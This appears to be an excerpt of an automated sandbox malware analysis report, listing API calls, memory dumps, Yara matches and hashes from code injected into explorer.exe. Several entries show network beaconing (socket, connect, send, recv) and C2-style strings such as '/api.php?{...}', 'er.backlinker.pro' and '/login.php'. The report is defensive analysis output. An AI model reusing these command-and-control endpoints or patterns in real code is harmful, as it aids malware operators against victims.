                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: send.WS2_32 ref: 0F3C46E7
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0F3C6263
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0F3C6270
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$CriticalSectionlstrcpy$lstrlenmemcpywsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonssendsocket
                                                                                                                                                                                                                                  • String ID: /api.php?{B955B2CC07A01546086603}${B955B2CC07A01546086603}
                                                                                                                                                                                                                                  • API String ID: 3614112389-2776999318
                                                                                                                                                                                                                                  • Opcode ID: 27fab9e54f04216fdd453d945221fa642927ccab0a3085506731d21741302df3
                                                                                                                                                                                                                                  • Instruction ID: fe645a8459e8be544e2a52e3b196b7db9727fc80a589b743951e9231f0ce5283
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27fab9e54f04216fdd453d945221fa642927ccab0a3085506731d21741302df3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7651E436A00B46D5EB20DB61E8543A837B8F748BA4F40463ACD0D97B69DF38C65AD740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4099253644-0
                                                                                                                                                                                                                                  • Opcode ID: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
                                                                                                                                                                                                                                  • Instruction ID: 275dd22894b74cdd35c9729c2cb7a93d60b54b67acf84b043e10176e40ca1269
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5311525A51E86C1FF19EB66E850BA463F0FB84B57F588619C9AD0F764DF3CC0419720
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Pointer$DecodeEncodeFreeHeap_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2825088286-0
                                                                                                                                                                                                                                  • Opcode ID: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
                                                                                                                                                                                                                                  • Instruction ID: de7f69124f23d9b7cee837411c4340116158ed3bcb5006a70dd9e170d952e5d3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21313066621A4681EE24DB61F8A47793364BB447F1F481336DE1A8ABA2CF3CD048D305
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: WSAStartup.WS2_32 ref: 0F3DAAC7
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: socket.WS2_32 ref: 0F3DAADC
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: gethostbyname.WS2_32 ref: 0F3DAAEE
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: memcpy.MSVCRT ref: 0F3DAB05
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: htons.WS2_32 ref: 0F3DAB13
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAAA0: connect.WS2_32 ref: 0F3DAB2A
                                                                                                                                                                                                                                  • recv.WS2_32 ref: 0F3DA88B
                                                                                                                                                                                                                                  • recv.WS2_32 ref: 0F3DA8A7
                                                                                                                                                                                                                                  • recv.WS2_32 ref: 0F3DA8C3
                                                                                                                                                                                                                                  • htons.WS2_32 ref: 0F3DA8D5
                                                                                                                                                                                                                                  • recv.WS2_32 ref: 0F3DA8ED
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0F3DA95E
                                                                                                                                                                                                                                  • recv.WS2_32 ref: 0F3DA977
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAC04: send.WS2_32 ref: 0F3DAC24
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAC04: send.WS2_32 ref: 0F3DAC41
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAC04: send.WS2_32 ref: 0F3DAC61
                                                                                                                                                                                                                                    • Part of subcall function 0F3DAB54: ioctlsocket.WS2_32 ref: 0F3DAB76
                                                                                                                                                                                                                                  • closesocket.WS2_32 ref: 0F3DA9EE
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recv$send$htons$Startupclosesocketconnectgethostbynameioctlsocketmemcpysocketwsprintf
                                                                                                                                                                                                                                  • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                  • API String ID: 1938678486-1542503432
                                                                                                                                                                                                                                  • Opcode ID: 148dea536ee756d11aa621f6b9b02c27fa6d64b4f0edc65fb89d0f5599d95eb2
                                                                                                                                                                                                                                  • Instruction ID: 96afa654d56a41bd958160f0fd467e059111824ee9457d796fd4f2195e87369c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 148dea536ee756d11aa621f6b9b02c27fa6d64b4f0edc65fb89d0f5599d95eb2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1841F773314745C6EB209F36FA44BA93791E7817B8F445231EA5A87AA7EB3CC189C300
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 08B9B8BC: malloc.LIBCMT ref: 08B9B90D
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 08B9B445
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _FF_MSGBANNER.LIBCMT ref: 08B923F4
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _NMSG_WRITE.LIBCMT ref: 08B923FE
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _callnewh.LIBCMT ref: 08B92432
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B9243D
                                                                                                                                                                                                                                    • Part of subcall function 08B923C4: _errno.LIBCMT ref: 08B92448
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08B9B7A4
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08B9B7AC
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08B9B7B4
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08B9B7BC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errnomalloc$_callnewh
                                                                                                                                                                                                                                  • String ID: &browser=$/login.php$PRI * HTTP/2.0$er.backlinker.pro$order.php
                                                                                                                                                                                                                                  • API String ID: 1604647524-1708799525
                                                                                                                                                                                                                                  • Opcode ID: 4b2b1adf0043a65120d632aea126014985a15e54a3d7811ee83749d63c7197c5
                                                                                                                                                                                                                                  • Instruction ID: 5b14780d5e46c8018190f1d8d739522958ef069951ba178d2d74cab01d007484
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b2b1adf0043a65120d632aea126014985a15e54a3d7811ee83749d63c7197c5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CA15032604B82C7DB24DF26F86479A77A1F789B95F448026DACA47B28DF3CD149CB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CompatibleCreateDeleteObjectWindow$BitmapPrintRectSelect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2993826089-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 7c5c0b0e52ec7e256b54492c0aeda894a87f46ce7d64ba09fe0c59287d068dc5
                                                                                                                                                                                                                                  • Instruction ID: a94f0c50b0fca4bec3ddb302643247fc588b923c38d98ff09a1dda7ceaa4e82f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c5c0b0e52ec7e256b54492c0aeda894a87f46ce7d64ba09fe0c59287d068dc5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F213C767147518BD7208F52E80871AB761F788FE0F544135EE8643B28CF7DD9898B40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0F3CDA75
                                                                                                                                                                                                                                  • __int64.LIBCPMT ref: 0F3CDA8D
                                                                                                                                                                                                                                    • Part of subcall function 0F3CF2A0: std::_Lockit::_Lockit.LIBCPMT ref: 0F3CF2B6
                                                                                                                                                                                                                                    • Part of subcall function 0F3CF2A0: std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CF2D9
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0F3CDA98
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0F3CDADA
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CDAE4
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0F3CDB08
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3CDB19
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 3923862141-3145022300
                                                                                                                                                                                                                                  • Opcode ID: e102a9ad19a8e7a41025c77a454af6dd80fba04dfcb66e042701d1384f84c676
                                                                                                                                                                                                                                  • Instruction ID: 2ee659ef1879f2c92a31a7db11531419d02739f780822177f8e45649d80857b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e102a9ad19a8e7a41025c77a454af6dd80fba04dfcb66e042701d1384f84c676
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A115426304B8591DE14EB26F44036AB361F7C8BF4F884235AA6D4BBA9DF7CD905C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0F3CD9B1
                                                                                                                                                                                                                                  • __int64.LIBCPMT ref: 0F3CD9C9
                                                                                                                                                                                                                                    • Part of subcall function 0F3CF2A0: std::_Lockit::_Lockit.LIBCPMT ref: 0F3CF2B6
                                                                                                                                                                                                                                    • Part of subcall function 0F3CF2A0: std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CF2D9
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0F3CD9D4
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0F3CDA16
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0F3CDA20
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0F3CDA44
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0F3CDA55
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
                                                                                                                                                                                                                                  • String ID: bad cast
                                                                                                                                                                                                                                  • API String ID: 3923862141-3145022300
                                                                                                                                                                                                                                  • Opcode ID: 0ef9bf9b3a3c8b1d7c1c14e83a5549400158f30c5fd718d05e14695aac5f073c
                                                                                                                                                                                                                                  • Instruction ID: 89e22f78c223ceb0dd9e9d1b661fd52438e61df1b0bc4410e35752fed93a7a08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef9bf9b3a3c8b1d7c1c14e83a5549400158f30c5fd718d05e14695aac5f073c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E118226304B4581DE10DB26F84036AA361F789BF4F884235AAAD0BFA9DF7CD506C740
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$_malloc_dbgisdigitmemcpystrtodtolower
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2125118114-0
                                                                                                                                                                                                                                  • Opcode ID: ef73b49cf0c9cd64157d83e6bf4c348908b8249506494ccf4071268af3775682
                                                                                                                                                                                                                                  • Instruction ID: 49732ee38c43e1f9e0ef7424d522020ee5a29b84cbe5c5054019ed2a30d84857
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef73b49cf0c9cd64157d83e6bf4c348908b8249506494ccf4071268af3775682
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D941E432A1475186EB20AF22D40072E77B5F348FA4F848439CE4657B26DB3DD895D780
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Pointer$Decode$EncodeExitProcess$__crt
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3248576438-0
                                                                                                                                                                                                                                  • Opcode ID: d77485e4ae4fd7f4c40678f353edd168e35972fc864df4be1653533e39431785
                                                                                                                                                                                                                                  • Instruction ID: 1d325d754b21e143a43c7f7c349fe2458b298ab26267c129472c6bec238cbec4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d77485e4ae4fd7f4c40678f353edd168e35972fc864df4be1653533e39431785
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87418D31216F8081F7549F25F85475A76B4F788B95F448529EE8E43B24DF3CC8968B10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: memcpy$lstrlen$??3@_malloc_dbgmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1784580453-0
                                                                                                                                                                                                                                  • Opcode ID: 8561b7d2a29b084477e0969429557f4ef6bc96801b895d2568cf40bf8b51876b
                                                                                                                                                                                                                                  • Instruction ID: 553d2576ddef46cfe5161ec1bbd3c2bb68f6f409b100df9f41475dc4fbc3856a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8561b7d2a29b084477e0969429557f4ef6bc96801b895d2568cf40bf8b51876b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D021E43671068186EB21DF66E8047A9B7A1FB48FE4F844439DE5A43B20EF3DD589CB40
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2288870239-0
                                                                                                                                                                                                                                  • Opcode ID: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
                                                                                                                                                                                                                                  • Instruction ID: e9624a8ca3e1ca9c8cbd35f523b19296d12a6cfa950843e9db02416c9ece646b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80ed7709b81fb865fd2701c9381c00cfa0a9080e0d9e421e8263a039d25805be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E314D25336A4481FE54EBA6F851B642330FB48B94F18D311ED5A57AA8DFBCC148CB15
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2288870239-0
                                                                                                                                                                                                                                  • Opcode ID: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
                                                                                                                                                                                                                                  • Instruction ID: 334a08dc5d6b0399cebb8dbbbbd363544c03011d4c60787c9561d2e745269a21
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7051a25efdbd17a82a2807977a1313b5b3715d4396367db5dc6440f37134454
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6313025A05A01A5EF2DDB55E8903683364FF84B96F488275CAFD0B760EFBCC05C8356
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08CBB176
                                                                                                                                                                                                                                  • RaiseException.KERNEL32 ref: 08CBB19F
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08CBB200
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBB153
                                                                                                                                                                                                                                    • Part of subcall function 08CB4B34: _getptd_noexit.LIBCMT ref: 08CB4B3A
                                                                                                                                                                                                                                    • Part of subcall function 08CB4B34: _amsg_exit.LIBCMT ref: 08CB4B4A
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBB205
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 08CBB211
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
                                                                                                                                                                                                                                  • Instruction ID: db3d92fd5e4403cf97fcf8ac69a905e784b6f6a06a28bc780df632bb258a1637
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a2fc0b797f98f79fe4a14a5232f7452d79c1f12860342049905014b00c6b91d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85212C3A204A94C6D634DF56E08039EB771F389BA6F454226CFEA07B54CF39D986DB01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0F3E0F8A
                                                                                                                                                                                                                                  • RaiseException.KERNEL32 ref: 0F3E0FB3
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0F3E1014
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3E0F67
                                                                                                                                                                                                                                    • Part of subcall function 0F3DFFDC: _getptd_noexit.LIBCMT ref: 0F3DFFE2
                                                                                                                                                                                                                                    • Part of subcall function 0F3DFFDC: _amsg_exit.LIBCMT ref: 0F3DFFF2
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3E1019
                                                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0F3E1025
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1037122555-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
                                                                                                                                                                                                                                  • Instruction ID: 719e763c65b73161b21dff463e09922e900647ffab5b150bfee8445aab4967d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16076cd70ee89e0090311c6e33922bef2e7ed2237c2f23457eed0913bfab5565
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E421577720479586C630DF22E04036EB760FB89BB4F444222DF9A07B95CB3DE886CB01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0C35CDB1
                                                                                                                                                                                                                                  • __int64.LIBCPMT ref: 0C35CDC9
                                                                                                                                                                                                                                    • Part of subcall function 0C35E6A0: std::_Lockit::_Lockit.LIBCPMT ref: 0C35E6B6
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0C35CDD4
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0C35CE16
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0C35CE44
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C35CE55
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
                                                                                                                                                                                                                                  • String ID: essorFeaturePresent
                                                                                                                                                                                                                                  • API String ID: 229301282-742855693
                                                                                                                                                                                                                                  • Opcode ID: 6b381f35d24918e929dfa518e24938e6305590d9e013242fead008017973fe58
                                                                                                                                                                                                                                  • Instruction ID: c2f590d2e7c9164fcc6785189c6c0f17318b12e78164cc8ae5fc9f70df6fa720
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b381f35d24918e929dfa518e24938e6305590d9e013242fead008017973fe58
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89118271324B8491DE10EB16F440799A361F788BE4F9892219E6D47FA8EF7CD14ECB01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0C35CE75
                                                                                                                                                                                                                                  • __int64.LIBCPMT ref: 0C35CE8D
                                                                                                                                                                                                                                    • Part of subcall function 0C35E6A0: std::_Lockit::_Lockit.LIBCPMT ref: 0C35E6B6
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0C35CE98
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0C35CEDA
                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0C35CF08
                                                                                                                                                                                                                                  • _CxxThrowException.LIBCMT ref: 0C35CF19
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_c350000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$LockitLockit::_$ExceptionFacet_GetfacetRegisterThrow__int64std::bad_exception::bad_exceptionstd::locale::_
                                                                                                                                                                                                                                  • String ID: essorFeaturePresent
                                                                                                                                                                                                                                  • API String ID: 229301282-742855693
                                                                                                                                                                                                                                  • Opcode ID: 9512719c947435c3d1f14965cb90e4aa7fc872366403922b4a8468ee3170a9cc
                                                                                                                                                                                                                                  • Instruction ID: 6c025cfa18dd45f3f3e28fdc29b9956070f81fb07160112c47dcdc04dc95e8eb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9512719c947435c3d1f14965cb90e4aa7fc872366403922b4a8468ee3170a9cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11116025324B8581DE10EB16F4407A9B361F788BE4F58D3219A5D47FA8EF78C50ACB01
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
